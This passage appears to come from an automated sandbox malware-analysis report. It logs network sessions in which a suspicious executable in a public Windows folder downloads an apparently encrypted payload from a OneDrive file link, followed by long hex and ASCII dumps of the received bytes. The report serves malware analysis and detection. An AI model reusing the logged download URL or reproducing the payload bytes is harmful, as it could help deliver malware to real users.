                                                                                                2022-08-08 18:12:29 UTC4INData Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 36 b1 a9 b1 9f 3e 9f 3e 28 a9 3c 2c 3a a1 2a ab b3 2a 38 a3 9d b3 9f a9 36 ad b3 a9 a9 a1 2c 40 3a 32 28 b1 a9 2e 3e 40 9f 9d ad a7 a9 af b3 a3 3c 32 ab a9 a5 36 ad 38 3e 40 3e 32 ab af a7 a1 2c 40 32 a9 2e b1 b3 30 9d 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 83 3e a3 b1 34 28 32 ab af 32 3e 9f 3c 30 a3 ab a7 9b a9 38 a5 3a a5 a1 3a 40 2c 36 a9 28 36 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 5a bd c5 bd d3 52 d3 52 64 c5 50 60 56 cd 66 c7 bf 66 54 cf d1 bf d3 c5 5a c1 bf c5 c5 cd 60 4c 56 5e 64 bd c5 62 52 4c d3 d1 c1
                                                                                                Data Ascii: cay y&&y]_ca&&y]]y6>>(<,:**86,@:2(.>@<268>@>2,@2.0cay y&&y]_ca&&y]]y>4(22><08::@,6(6cay y&&y]_ca&&y]]yZRRdP`VffTZ`LV^dbRL
                                                                                                2022-08-08 18:12:29 UTC5INData Raw: 6d de 15 18 d3 66 2a 25 ed c1 b5 9a 33 db 36 a3 c9 dc 0d b3 6b 14 8a c3 cc 48 31 fa 34 9b ba 1f 3a b5 11 03 73 b3 27 e7 96 3c 63 5f 7c 43 c9 f8 68 d3 c9 58 ea d8 50 6a 0e 3c c2 84 85 ae 98 7a f2 64 8d eb 2d cc 6d 24 8f e0 cc f4 8f af 32 6b d8 3e bb 99 9d 96 93 a5 7f 92 0e 45 64 e6 9e 3f d9 25 8f 11 70 6a 80 45 c2 63 e7 bc 45 c5 0a 42 11 c2 fb 65 fd a3 36 ec 1b 59 99 21 30 81 e9 a2 c7 81 1a fa 80 0d 0b 11 26 51 1c 2a 22 b5 51 42 cf 84 10 34 11 a4 3a 68 40 ab 1a a3 b9 3e 8e 3c e1 1c e1 5b 2c 50 b9 53 da 21 6c e3 58 be 68 8b 8d f4 9a ba 12 67 81 3b 59 d0 1e e6 ab 2c be 6a 8d 6f 11 a3 79 c7 43 99 d0 fb 17 c4 64 d9 ac 4f ce 02 6e 4b 8a d8 e6 53 ef 5e b9 85 8b d8 38 a5 e1 53 b0 ef e6 95 4f ce dd 30 4f 6a 83 5e 20 05 a1 36 8c 2a af d2 4d 5a 87 b0 76 30 ff 4d b2
                                                                                                Data Ascii: mf*%36kH14:s'<c_|ChXPj<zd-m$2k>Ed?%pjEcEBe6Y!0&Q*"QB4:h@><[,PS!lXhg;Y,joyCdOnKS^8SO0Oj^ 6*MZv0M
                                                                                                2022-08-08 18:12:29 UTC13INData Raw: d2 bf 98 08 82 b6 0c d0 a7 a7 b3 b3 e4 54 7c 5f e7 57 a8 ce 84 2c b8 b3 97 e2 b2 31 98 51 9c 2e bf 0f 21 1b cc 95 a2 d8 fb 04 10 a4 a0 57 2f 62 d9 bd fc 21 a2 f9 2a de c1 2e ce d4 d0 c3 0b a5 cd a4 82 11 18 23 88 fd a8 1c b0 15 d7 b1 21 4d f6 07 7a 82 cb eb a9 db 91 19 a9 da 8c 3d 3a 9d 7a 83 40 24 8e 5e d9 7c e5 08 fd 8d 3c af 83 5c 9e dd e3 3f 99 30 7c d1 f3 7d 20 5f 3c 69 aa e9 b2 b4 30 c2 7b 4d 93 50 a2 79 b3 38 bc d9 2f 6c 33 f3 f3 8b 72 d5 b5 06 95 5a f0 80 80 be da 60 0f e8 92 ae 95 33 03 fd 3d 9d 3a ca 99 10 0f cd e9 1a 17 44 64 57 2b ec 34 eb 66 5b cc 7e c2 7b fa e7 3d 7a 13 08 b5 34 71 2a a5 2e b5 0e 3a 81 d5 b6 83 99 1f 79 5c e0 9d 08 4d 5d 72 44 e7 a6 90 52 08 67 b4 a5 1d fd 52 03 52 44 1c 39 ae 4c a8 35 c5 1b e4 80 23 0c ae be 4a 2d 3e 10 19
                                                                                                Data Ascii: T|_W,1Q.!W/b!*.#!Mz=:z@$^|<\?0|} _<i0{MPy8/l3rZ`3=:DdW+4f[~{=z4q*.:y\M]rDRgRRD9L5#J->
                                                                                                2022-08-08 18:12:29 UTC21INData Raw: 59 b3 01 ad 6d 0a e0 51 3b b9 7d 5b 53 40 4f 0c ea c9 ed 27 01 f3 dc 79 2a fe 28 1d 0d 8c 4b a6 d9 db 84 33 fb 31 78 67 a7 b7 39 2f ea 92 1b bc 18 02 0c b9 d3 9d 0b ec 2f 09 cc 67 04 33 69 06 db c8 8a 61 85 23 98 d6 92 58 4e 98 8c 81 d8 90 f9 ee 28 ed 9a 5d 83 8b 9d 8a cd 93 50 4e 1b 07 04 a2 07 8c f4 6d 6b d6 ad ea 54 e2 41 6f d2 7b 2a 46 63 2e d4 c8 3d 69 60 52 0a 71 85 be 9e 81 26 3a aa 75 15 73 87 4a 1c 01 5e 4e 3b af 83 67 c2 94 02 01 7a 74 41 24 ea 75 c2 99 b9 58 4d 7a 6e bf 2c 4a 0d 06 06 f5 ab 00 52 c6 e8 0e 3a 56 27 1d 74 37 18 b2 54 c3 77 cb 52 c7 39 74 a1 d8 a4 a6 e8 5b e5 7f 4c 5f 90 f3 c9 38 ca 64 8f 22 f4 b2 01 04 6e af d8 57 e0 17 4b 8a cd bb 07 61 e7 b7 7a 0d 2d a8 17 30 e9 f9 c2 9e 53 c1 50 49 a5 79 3e b8 dd 82 c9 45 47 c3 86 66 f5 96 15
                                                                                                Data Ascii: YmQ;}[S@O'y*(K31xg9//g3ia#XN(]PNmkTAo{*Fc.=i`Rq&:usJ^N;gztA$uXMzn,JR:V't7TwR9t[L_8d"nWKaz-0SPIy>EGf


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                3192.168.2.34974813.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:30 UTC29OUTGET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                User-Agent:
                                                                                                Host: 2q5ira.ph.files.1drv.com
                                                                                                Connection: Keep-Alive
                                                                                                2022-08-08 18:12:31 UTC29INHTTP/1.1 200 OK
                                                                                                Cache-Control: public
                                                                                                Content-Length: 176597
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                Expires: Sun, 06 Nov 2022 18:12:30 GMT
                                                                                                Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                X-MSNSERVER: PH2PPF15A64ABD6
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                MS-CV: dfBygyJ9i06G5jgO8XruCA.0
                                                                                                X-SqlDataOrigin: S
                                                                                                CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                X-PreAuthInfo: rv;poba;
                                                                                                Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-StreamOrigin: X
                                                                                                X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 66AFC2CCFCA2402593ADA0EF4868C722 Ref B: VIEEDGE3016 Ref C: 2022-08-08T18:12:30Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:30 GMT
                                                                                                Connection: close
                                                                                                2022-08-08 18:12:31 UTC30INData Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 36 b1 a9 b1 9f 3e 9f 3e 28 a9 3c 2c 3a a1 2a ab b3 2a 38 a3 9d b3 9f a9 36 ad b3 a9 a9 a1 2c 40 3a 32 28 b1 a9 2e 3e 40 9f 9d ad a7 a9 af b3 a3 3c 32 ab a9 a5 36 ad 38 3e 40 3e 32 ab af a7 a1 2c 40 32 a9 2e b1 b3 30 9d 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 83 3e a3 b1 34 28 32 ab af 32 3e 9f 3c 30 a3 ab a7 9b a9 38 a5 3a a5 a1 3a 40 2c 36 a9 28 36 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 5a bd c5 bd d3 52 d3 52 64 c5 50 60 56 cd 66 c7 bf 66 54 cf d1 bf d3 c5 5a c1 bf c5 c5 cd 60 4c 56 5e 64 bd c5 62 52 4c d3 d1 c1
                                                                                                Data Ascii: cay y&&y]_ca&&y]]y6>>(<,:**86,@:2(.>@<268>@>2,@2.0cay y&&y]_ca&&y]]y>4(22><08::@,6(6cay y&&y]_ca&&y]]yZRRdP`VffTZ`LV^dbRL
                                                                                                2022-08-08 18:12:31 UTC34INData Raw: 36 e7 01 ac 10 02 72 1e 00 37 eb 8b 38 20 bc ee 4f 16 3f c5 d1 6a fd 38 e8 e5 9a c2 ab 56 39 1c 0c 10 75 87 d3 b0 49 76 9a 9f 91 13 bd f4 2f bb e9 45 0d 71 83 4e 1c 7c 9b c3 5f e0 fd 56 79 a8 74 52 c0 d6 55 9c 92 9b 28 ee 5e c0 ff 2d 0d 60 40 4e 63 1c 73 c7 ab 7a f2 fd 52 78 80 dd 07 80 fc 27 7c c8 34 34 49 79 7b c0 4f fa 49 2c 4b 2c f1 11 60 62 fe 06 00 bc fc 7e b8 3f ce 01 0e 34 d1 d0 c7 dd 59 9d 60 6e 45 9d 84 95 1c d6 f2 65 c7 11 f2 c2 73 5e 5d b3 7a 18 ae 03 63 39 4b ad 28 7f ff 46 9d e2 8f 86 93 72 6f d0 77 14 9b 27 c3 0e dc 43 82 9f ba 0f 7b 66 e3 8f bf a3 ea a2 1d 21 94 1b ad a4 91 e1 93 e6 43 e2 ce 34 89 81 78 6f 1f d9 34 2b f1 ce 5c 51 ff e9 8f fe a3 45 a6 50 0c 0f 5f 49 cd 0e ea 09 4f 10 73 9d 91 f4 b1 4b aa 9a fe cf dc 21 3c a4 9e a0 8a 1a d7
                                                                                                Data Ascii: 6r78 O?j8V9uIv/EqN|_VytRU(^-`@NcszRx'|44Iy{OI,K,`b~?4Y`nEes^]zc9K(Frow'C{f!C4xo4+\QEP_IOsK!<
                                                                                                2022-08-08 18:12:31 UTC42INData Raw: d4 4a 54 8c 8f 66 71 e9 f9 d1 79 65 38 5f 05 6d a8 15 f7 a5 56 a1 1f 7e 45 bc 40 07 ae 7f 23 b6 68 0d 36 18 86 dd fb 10 16 fb 5a 6c 9d 0d e9 96 75 46 f2 f4 26 c8 4a 4a 3a 89 2f 15 2b 61 5a c7 24 7e 59 9e 38 c6 48 9a d5 c3 be 9d d8 9e a7 3a 19 28 52 c7 55 33 74 3e 74 83 73 ba ad 12 dc be be 6a be 45 50 f9 8f cb 0b 7e 99 90 7e dd f5 fa 91 3d bd 2b 43 97 b1 a3 45 8a 71 4d 34 84 60 58 db 59 9c 75 2e 32 f1 0c 57 7e 7b c5 96 6f 16 72 1e 96 2e fc 51 5d 4d 3a b1 43 25 1e 59 21 f3 36 40 19 6a a2 d7 d1 9e 10 d4 19 45 f5 19 7d 27 63 d6 89 69 6a 88 0e 05 10 c5 a0 43 96 91 63 9c d9 cb be 66 d7 4a 50 09 de 41 1c c6 de ea ca 4e 63 70 85 eb e9 ac 1f 53 98 34 72 93 f3 9f 5a b2 8e 74 c4 19 2a 01 35 36 2f 48 60 54 70 75 3a ee 80 49 23 39 14 43 56 cb 98 d2 d3 e7 a7 8d 76 78
                                                                                                Data Ascii: JTfqye8_mV~E@#h6ZluF&JJ:/+aZ$~Y8H:(RU3t>tsjEP~~=+CEqM4`XYu.2W~{or.Q]M:C%Y!6@jE}'cijCcfJPANcpS4rZt*56/H`Tpu:I#9CVvx
                                                                                                2022-08-08 18:12:31 UTC50INData Raw: 9f a1 93 ed 9a 20 f5 99 d7 8f 76 7c 42 d9 cd bc 1a 00 cc 22 ad da f3 28 22 0f f3 fc 85 6e 1c b0 83 c7 ad 26 8c 6e b2 74 51 34 ac 49 3a cd 3d 9c 12 67 cf 4d dd d0 e3 27 60 52 91 53 62 b5 30 56 b8 84 0f c2 7f 18 9d ec 64 73 16 d1 c9 61 d0 e4 c0 ea 0f 9a 0e 69 d5 4c 16 83 00 6a ab f1 e7 9e c0 c5 f4 e2 44 c7 1d 74 06 1c 84 ae ca f8 ad e7 fb 1a 03 a7 4e dc 9c 49 a8 6c 93 c7 9c f8 44 35 8c c1 54 17 1c 63 f8 7e b3 37 13 17 94 45 b9 88 01 0f 70 a1 85 eb 57 bc ba 54 d7 59 8c 29 16 0b e9 3e 3b b6 dc d7 bc b5 ff 1c ff 87 30 20 ff 98 12 e8 06 b7 4d b3 48 41 95 60 cd c9 2a 94 c0 3c c1 76 a1 5a fe ae 2a 56 63 fc 38 17 c0 9c d8 db 24 99 fd 84 6f 5b 9c 19 23 7b f4 5d 97 fe 03 86 df 06 c4 00 f6 7e 27 c4 4f 13 f7 e4 5a 64 eb aa b1 dc 36 a3 48 94 ce 88 8f 95 14 88 33 f7 6e
                                                                                                Data Ascii: v|B"("n&ntQ4I:=gM'`RSb0VdsaiLjDtNIlD5Tc~7EpWTY)>;0 MHA`*<vZ*Vc8$o[#{]~'OZd6H3n
                                                                                                2022-08-08 18:12:31 UTC58INData Raw: aa fd 29 40 57 b6 d5 76 ae 64 57 49 45 bf ca 8b cb 3e 4e 6b b0 e4 b2 bf ed d6 28 09 b7 46 9e 6b ee e9 40 5c 4c ca e2 4d c1 d2 dc bf 58 d1 e9 9a 87 c6 82 f6 de 02 6c 23 29 6b b3 0f b7 dd 56 f7 7a 7f 55 70 38 85 c1 0a 27 a4 4b f5 24 f9 9b 18 e1 57 e1 e0 8a cf 8a 78 9e 5b 9f 94 15 b5 78 de c0 e3 af c3 e9 69 b9 be 7a 9f 10 29 b6 d3 bb b8 0b d4 dc 46 59 5d 25 85 c9 84 4b 3f dc 9b de d3 f1 63 96 8e 1b 8b a6 b4 0c 2b 99 02 42 9d 66 52 7e 76 43 f8 63 52 6b 5c 41 b9 8a 75 fd dc a9 51 55 b9 d0 e7 11 44 57 a5 18 0a e3 05 f3 ec 28 0d 5c 3c 19 4a 13 c0 3b 42 2d 21 8e 0a 1b e0 cd 48 66 be 28 05 a1 6f b8 52 6d cb 67 06 1d c1 ae c9 55 46 bd 3f 7d 3f ad 8e 83 7e ef 44 60 9f 1e a4 7d d6 1b a4 dc d9 2b 45 e9 c8 17 a4 4a 15 b4 f0 0e 6c c0 1d 37 0f fc 77 3e b6 df cb 64 ba ab
                                                                                                Data Ascii: )@WvdWIE>Nk(Fk@\LMXl#)kVzUp8'K$Wx[xiz)FY]%K?c+BfR~vCcRk\AuQUDW(\<J;B-!Hf(oRmgUF?}?~D`}+EJl7w>d
                                                                                                2022-08-08 18:12:31 UTC66INData Raw: 7d f4 f1 2c 7d 68 e4 a6 d7 1f 54 92 d5 fd a1 7e 0e 71 0c 47 b7 f3 11 78 5f 82 80 04 69 34 fa a6 0b cc 62 f2 6d 63 32 92 71 6f 47 1a be 6c ca f2 d4 57 b2 aa 47 94 4a ad b0 d2 c1 e3 80 9f 9b dd d1 27 0d c1 65 43 bf 94 0f 5e 80 fd b3 d4 e8 fb d4 50 c0 64 62 2f 18 d6 9b 73 50 91 3a c3 7b 2a af 18 af 04 f9 08 5a 3c 8f 9f 6a 71 29 95 c8 01 20 d2 69 5e 7a b2 d4 f3 3a 61 10 64 8b 5b ea fe 87 22 43 3c 89 07 c1 47 f5 6f 69 ab 96 e0 1a 8c 17 ee 78 ba bb 9d 06 e3 06 c1 76 a1 84 76 30 ba 74 ca c5 6d 26 2e 07 07 71 62 4d d1 5b b6 f3 cd b4 36 e4 9d 77 67 a7 90 c9 7b 45 6e 1d 13 6c 10 90 0b 08 6a b4 fd 97 33 29 f2 69 0f af c1 ce 4a d0 b2 1d 04 67 01 8b 68 1b 6b 36 5a bf a8 74 22 c7 54 d1 4c 6b f5 42 a9 67 bf 15 89 c8 47 a1 2d 91 dc a0 25 40 bf 4f 25 e7 23 44 91 85 c7 5c
                                                                                                Data Ascii: },}hT~qGx_i4bmc2qoGlWGJ'eC^Pdb/sP:{*Z<jq) i^z:ad["C<Goixvv0tm&.qbM[6wg{Enlj3)iJghk6Zt"TLkBgG-%@O%#D\
                                                                                                2022-08-08 18:12:31 UTC74INData Raw: 97 ec 17 99 57 0a 16 e4 4c 7a 95 5f ff c2 72 9b 07 ff b9 ac 45 e9 be a4 72 c9 8d be 09 52 45 ba b8 5e a2 3f b2 ac 4e 70 76 fc 3e 4b 68 38 17 68 a5 9d 50 85 f6 96 b4 9c 97 50 a0 fe c4 8f 60 a4 45 6c 6d 9b a0 70 f9 f9 7d fd 10 af 15 5f 73 13 c9 a9 62 14 93 49 3b 31 39 b2 10 ef 4c a5 a8 13 e8 3c f4 49 18 b9 20 c8 1a c8 7d ae db 48 f0 9a 83 23 8b 81 02 75 16 29 b4 db 10 31 a1 41 da 9a ea db c4 78 a5 a5 72 56 be 76 70 55 8b fa 20 29 64 85 90 24 4a 46 e6 52 9a b8 c4 b0 7f 04 c5 ad 82 08 00 de 44 a7 5f 90 a0 9e 29 1b 14 cd 53 29 b5 d2 38 89 5d 1b 57 0e 30 00 9f 58 7a aa fb d5 14 88 f5 58 4b ef f8 26 78 2c 45 0b 0e aa d2 e8 09 c9 f2 2f f8 54 57 5d c1 7f c2 b8 a6 27 27 e1 11 54 3b 7f 12 db e3 15 fa d1 36 22 ba 48 16 02 35 db 5c e6 fc 6a 9b 37 19 c4 79 d1 12 63 12
                                                                                                Data Ascii: WLz_rErRE^?Npv>Kh8hPP`Elmp}_sbI;19L<I }H#u)1AxrVvpU )d$JFRD_)S)8]W0XzXK&x,E/TW]''T;6"H5\j7yc
                                                                                                2022-08-08 18:12:31 UTC82INData Raw: 5f 6b cf a5 ee 90 b8 75 c1 cf cf 48 49 1b 03 ed ad ec ee 9b 21 92 70 aa 1f 31 5e c5 6f cd 67 62 06 5d 49 0f 4c 62 5a c2 46 25 2a 09 af 0f d4 fa 25 01 31 3f 5e 60 d7 75 ca 1b 2a f8 a8 d8 1f d4 0c fa 52 24 9d 16 d6 81 7d 1c 35 b8 3f 67 97 99 41 16 29 6d bc 74 58 04 f8 2f bd c3 56 19 39 aa 8a 93 d3 5d ab bb ce 18 3f e8 ab 61 54 f6 17 5f 36 bd 27 9e cd 63 bc 71 b4 83 c0 37 c4 6b 4d af 85 9c c2 25 b6 f9 51 1e d1 bd 5e 53 49 bc 59 de a8 f7 c4 da 4d db 76 43 e1 cb 34 5b 10 54 58 52 a9 ce 33 43 69 7c fd 5f be 5c d1 64 42 ce 23 e5 a8 d5 98 2d 50 54 4c bb 22 4d 33 5d e3 7c 89 02 62 95 56 4e 4e 83 2a b0 1b f5 45 0c 33 5a 45 a1 52 29 54 29 b6 0c 7b e9 67 35 31 62 60 c9 e5 3f c2 89 12 6b cd 42 14 92 8e c2 7e 09 3a aa e3 5b f4 67 1e 53 6f 06 fb 25 67 4e cd b9 56 d2 c4
                                                                                                Data Ascii: _kuHI!p1^ogb]ILbZF%*%1?^`u*R$}5?gA)mtX/V9]?aT_6'cq7kM%Q^SIYMvC4[TXR3Ci|_\dB#-PTL"M3]|bVNN*E3ZER)T){g51b`?kB~:[gSo%gNV
                                                                                                2022-08-08 18:12:31 UTC90INData Raw: 79 43 c6 d2 42 33 4f 28 54 a9 c0 55 86 0c c5 4f 1c 8c 2d 79 d0 62 c3 7a 69 7c b6 b2 60 03 d5 3f 42 c7 ca b1 bc 25 53 36 d1 9f 1f cc 8b 0f 2e 39 81 a0 8d a1 0e a9 23 12 43 18 73 0c fd 85 61 c3 15 10 51 2f 79 e4 cb 50 6a 96 74 21 33 25 37 4f 2a b0 a9 66 49 a7 ae 2f d0 36 aa 51 ce b0 31 be 2d b7 ac 41 b5 b0 da 28 52 42 21 72 79 f9 25 53 61 54 39 46 7d ad c4 8d 4f a8 0a 53 76 5f 54 d3 6c a0 eb c2 23 c6 31 1d 38 cf 05 66 42 27 19 de 46 c4 d6 47 4a d2 42 b0 27 41 a5 b8 d2 ce 2f 35 21 99 21 de 38 31 51 36 66 36 ac c5 ad cd 17 50 d6 36 97 5c 23 18 64 13 47 39 08 8c 35 53 48 c9 a2 20 43 6f ae 39 38 08 94 12 ee cf 9e c1 cb 49 b0 2f ca 43 3b b4 40 1d a4 b9 ec 0b 4c 52 fb 43 18 25 a2 20 43 66 49 a7 c9 3a c2 30 be 19 13 32 63 34 8d 0b c0 9e 7d 96 ba d5 3b 42 94 5e 49
                                                                                                Data Ascii: yCB3O(TUO-ybzi|`?B%S6.9#CsaQ/yPjt!3%7O*fI/6Q1-A(RB!ry%SaT9F}OSv_Tl#18fB'FGJB'A/5!!81Q6f6P6\#dG95SH Co98I/C;@LRC% CfI:02c4};B^I
                                                                                                2022-08-08 18:12:31 UTC98INData Raw: d1 aa b2 dd ae ba 52 d3 c6 ac 95 b7 c2 56 98 1f 92 b6 aa 4d 2a c9 53 36 d1 9f 1f 73 de fe a8 d8 a3 7b 88 05 7e 54 31 1f ba 36 33 35 47 40 b0 2f 31 b5 33 2b 79 e4 b6 45 b1 ba e0 b7 ba 19 46 cb cd b0 40 86 b6 2b bd bf a8 1d 0a 3a 27 bd a6 bc a6 1b a8 dc b5 58 da 28 52 42 21 d8 83 2e 00 c3 d7 92 5a 4e d5 08 13 8c 70 bd 1b bc 5a 38 b6 b6 ac a9 be 1d 7d e6 35 47 3a 23 dc 9b 2f 1b 2c 5a c1 c4 7e 74 21 37 c7 c3 1f 1d 10 ab bc c5 17 c2 8a 35 1d 43 38 bd 51 36 66 36 ac 70 f1 7d 96 17 6e d7 b4 b2 aa 08 e2 27 3a 27 49 9f 31 21 40 c5 cd 23 50 6e 2d 2d bd c5 b6 c6 1c 34 33 c1 9e 29 96 b6 23 49 9b bf 49 2c 4e 44 aa 5e e4 3d 88 6d e9 26 fb 01 ef cf b6 2f 2b 3a be 25 d6 38 b6 2d 2d b7 be be 18 c8 bc e4 b3 25 ca 42 1b b8 b1 cf d1 bc ce dd 29 a8 bf c5 31 d5 10 ab b4 5e 11
                                                                                                Data Ascii: RVM*S6s{~T1635G@/13+yEF@+:'X(RB!.ZNpZ8}5G:#/,Z~t!75C8Q6f6p}n':'I1!@#Pn--43)#II,ND^=m&/+:%8--%B)1^
                                                                                                2022-08-08 18:12:31 UTC106INData Raw: 68 c3 9e ed 29 36 a3 41 cc a2 a3 c8 31 9b 2f 83 de 18 b5 71 41 df 37 c6 d0 68 94 f9 2e c6 ae 5c fd 2e 3d d7 a4 c5 86 50 47 d1 6c 5c 9f 98 c2 a8 51 70 68 75 7c 1b 0e 84 da 72 ae c3 04 47 a0 bc d0 b8 13 04 3a f8 7d a5 cd 16 4f 2b 95 86 3d 8c 0e 27 63 21 a6 01 87 05 eb b6 47 4d bb 85 81 35 08 37 f9 48 d6 11 f6 cf 56 c9 50 44 96 07 2e df 3d da 83 20 e8 81 43 fd fb 9a 54 cf 96 e8 75 f9 52 06 00 34 df 23 d4 51 2c 91 0f 37 74 b2 d7 9d 7c e5 51 8a dd 0b cf 51 49 70 3a a6 e8 30 56 fc 29 dc 76 cc b4 28 dd ca 21 ad 89 1b 02 5e e8 c5 5f 54 22 89 b9 f0 9c 82 bc 91 a0 f0 55 f2 66 d9 5d cf 25 c7 6a be f8 ed 7a 54 ec 8f 36 b9 ef dc 07 14 ab c7 78 35 48 cc e1 29 83 26 49 79 72 b2 b5 1d 4f 21 55 3b 55 09 75 8c 3f 1b c6 5b 80 9b 53 42 ee b1 93 e4 86 fe ae 4d 32 c8 7c d9 62
                                                                                                Data Ascii: h)6A1/qA7h.\.=PGl\Qphu|rG:}O+='c!GM57HVPD.= CTuR4#Q,7t|QQIp:0V)v(!^_T"Uf]%jzT6x5H)&IyrO!U;Uu?[SBM2|b
                                                                                                2022-08-08 18:12:31 UTC114INData Raw: 78 82 6a 70 e9 f1 76 08 c9 30 cd 44 1b 1d 69 82 2a c1 cf c1 d6 55 1b 74 3b c3 bd 54 55 ca c2 27 fd fa bd cf c3 f3 76 23 cd 60 5c b7 c8 bc 1a e8 d7 04 c9 54 c1 66 99 53 27 0e 65 18 b9 9f cd 3a c7 49 9f d8 33 1c c4 19 e4 a9 5a d2 a1 10 13 ed b7 98 93 73 11 8a 70 8e 37 41 ea aa 4b ce c8 ae 4d b1 2d 92 12 51 bf 7f e6 cd 60 8c 08 dd be b0 f1 d1 49 b6 38 31 39 36 62 3f b7 d5 40 bf c5 c7 5c 60 66 41 27 54 cf d1 bf 27 49 93 c1 37 d4 c8 9c 0f 7e 39 4a e0 d6 d5 ce 39 bc e9 22 f7 66 7b 4e 82 2a b4 d8 42 c9 4d 51 f7 b9 54 c1 b2 00 da 46 f6 73 55 a9 15 f4 65 38 4e cd 60 f2 41 c4 16 dc 56 57 39 63 f4 45 a5 c7 5c d7 ee d0 27 54 cf 3d ac 02 e0 49 50 4e 54 49 e2 21 ba ee 07 64 bd a0 e6 89 49 cc 34 50 5a 54 aa 43 ae e5 51 0a 13 86 9f 15 a4 13 c0 0e 53 c7 c3 cb 5a 78 21 2d
                                                                                                Data Ascii: xjpv0Di*Ut;TU'v#`\TfS'e:I3Zsp7AKM-Q`I8196b?@\`fA'T'I7~9J9"f{N*BMQTFsUe8N`AVW9cE\'T=IPNTI!dI4PZTCQSZx!-
                                                                                                2022-08-08 18:12:31 UTC122INData Raw: 2d 70 da 40 c5 9c 3b 7d 39 52 4c 48 66 a9 46 5a 5c d5 80 86 ac 31 54 3a 5c d1 60 29 3b 4e 93 bf d3 52 49 4a 68 2d 3e 33 a1 c7 bf da 75 f7 33 ac 9b 49 9d c1 8a c5 c5 d7 b4 d2 c5 1e c9 bd c5 58 4a 3a 36 d1 c1 e6 fc db b2 ef ae 99 c7 c5 55 a9 d9 b6 21 6c de 99 c7 96 cb cd 5a 54 28 40 d3 4c bb ee e9 33 b0 c1 25 36 52 d3 48 b0 3b c3 20 bb cd 66 ca 21 7e b6 97 55 38 d3 c5 e6 f7 e7 b6 a8 95 be ab 56 0b 64 bd bf 5a cc a9 d3 d1 52 e0 ca c2 c7 c7 3d 5e c7 56 e0 f1 c1 54 48 b8 cc cd fe 7f e6 8d cd 4c 5e c8 49 e5 1d 7c 55 9d bd c5 d2 d1 6a c0 1f 84 1b b7 60 03 cd 66 bd c7 d8 b1 5e 60 bb 4f dd 33 23 1b dc 40 c9 cc a9 56 5e 5e 29 3b d1 12 c1 d3 d1 cc 10 dd ae 8f 31 b7 5e c7 ca fa 82 23 27 22 e0 b5 2d c7 c3 d1 d5 36 a9 5e c5 d1 6e d0 1d 91 55 19 1b 4c be b0 eb d8 a3 b6
                                                                                                Data Ascii: -p@;}9RLHfFZ\1T:\`);NRIJh->3u3IXJ:6U!lZT(@L3%6RH; f!~U8VdZR=^VTHL^I|Uj`f^`O3#@V^^);1^#'"-6^nUL
                                                                                                2022-08-08 18:12:31 UTC130INData Raw: c0 38 b2 99 27 60 bd ca 9b d1 5a 9f d3 e5 c0 2a 3f b5 c2 fb 50 60 c6 f0 d2 b0 5a 2b 55 c6 36 1d 8b 41 9d b2 bd c5 d8 2a 60 4c 9b 19 7c b0 7d bc b5 c4 0d 1f c9 e6 f4 7f d2 1f dc 9b c7 c5 a9 fa d9 b6 b2 3b b5 2d df 4f 2c c0 62 4c 31 42 62 bd 32 fe e9 b8 e5 41 3a d3 52 b3 47 7c b6 c0 3f b1 c0 4a 19 38 35 55 cf d1 32 59 dd b8 cd 3b 42 c5 cd 40 13 6e 37 37 b9 49 a5 21 4d d3 d1 2c ca dd ae bb 31 b7 93 11 6a 2c fb 11 4a 8c 0c 3d 5e c7 50 ab 53 4b a8 22 c8 b6 03 3a cd 60 d8 0c dd 1f 33 d4 34 21 d5 54 c1 fb 39 2a 5e 71 3a 66 54 08 d3 e7 be bb 0f 50 4e 54 9e 32 a7 4c 56 ad 75 e5 54 d3 c3 17 dc 49 c1 2b ee d6 d7 43 79 33 19 bf ae 56 4d 7d 6c e0 39 07 e5 